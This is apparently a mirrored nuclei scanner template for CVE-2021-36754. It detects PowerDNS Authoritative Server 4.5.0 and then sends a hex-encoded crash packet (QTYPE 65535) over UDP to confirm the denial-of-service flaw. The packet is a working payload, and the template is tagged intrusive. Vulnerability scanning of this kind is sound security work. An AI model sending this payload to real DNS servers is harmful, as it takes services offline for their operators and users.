mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-14 14:43:29 +08:00
98 lines
2.9 KiB
YAML
98 lines
2.9 KiB
YAML
id: CVE-2021-36754
|
|
|
|
info:
|
|
name: PowerDNS Authoritative Server - Denial of Service
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
PowerDNS Authoritative Server 4.5.0 before 4.5.1 allows anybody to crash the process by sending a specific query (QTYPE 65535) that causes an out-of-bounds exception.
|
|
impact: |
|
|
Attackers can crash the server process, leading to denial of service and potential service disruption.
|
|
remediation: |
|
|
Upgrade to version 4.5.1 or later.
|
|
reference:
|
|
- http://www.openwall.com/lists/oss-security/2021/07/26/2
|
|
- https://doc.powerdns.com/authoritative/security-advisories/powerdns-advisory-2021-01.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-36754
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-36754
|
|
cwe-id: CWE-119
|
|
epss-score: 0.84525
|
|
epss-percentile: 0.99309
|
|
cpe: cpe:2.3:a:powerdns:authoritative_server:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: powerdns
|
|
product: authoritative_server
|
|
tags: cve,cve2021,js,dns,powerdns,authoritative_server,dos,intrusive,vkev
|
|
|
|
javascript:
|
|
- pre-condition: |
|
|
isUDPPortOpen(Host,Port);
|
|
|
|
code: |
|
|
const c = require("nuclei/net");
|
|
|
|
let conn;
|
|
let isPowerdns = false;
|
|
let isUp = false;
|
|
|
|
let validPacket = "1ea0012000010000000000010776657273696f6e0462696e64000010000300002904d000000000000c000a00089f750bc0808677d1";
|
|
let dosPacket = "296e01200001000000000001046f617374026d6500ffff000100002904d000000000000c000a000805dbdf1a40effcf4";
|
|
|
|
// Simple test to make sure the DNS server is using the PowerDNS Authoritative Server
|
|
conn = c.Open('udp', `${Host}:${Port}`);
|
|
conn.SendHex(validPacket);
|
|
const result = conn.RecvString();
|
|
|
|
if (result.includes("PowerDNS Authoritative Server")) {
|
|
isPowerdns = true;
|
|
} else {
|
|
isPowerdns = false;
|
|
}
|
|
conn.Close();
|
|
|
|
// Send DoS Payload
|
|
conn = c.Open('udp', `${Host}:${Port}`);
|
|
conn.SendHex(dosPacket);
|
|
try {
|
|
conn.RecvString();
|
|
} catch {
|
|
//
|
|
}
|
|
conn.Close();
|
|
|
|
// Simple test again to make sure PowerDNS is down
|
|
try {
|
|
conn = c.Open('udp', `${Host}:${Port}`);
|
|
conn.SendHex(validPacket);
|
|
conn.RecvString();
|
|
conn.Close();
|
|
isUp = true;
|
|
} catch {
|
|
isUp = false;
|
|
}
|
|
|
|
if (isPowerdns && !isUp) {
|
|
Export("Vulnerable to CVE-2021-36754")
|
|
} else {
|
|
Export("Not Vulnerable")
|
|
}
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 53
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'Vulnerable to CVE-2021-36754'
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- success == true
|
|
# digest: 4b0a00483046022100d8822ee75f42f6c9fe6135cd75626b01cbcb84144c6c574570f8f5666c92ea3c022100f91da9b561427fd66b780760ece8dce02e7b2c0f274cae76f12a017c8cbca1d6:922c64590222798bb761d5b6d8e72950 |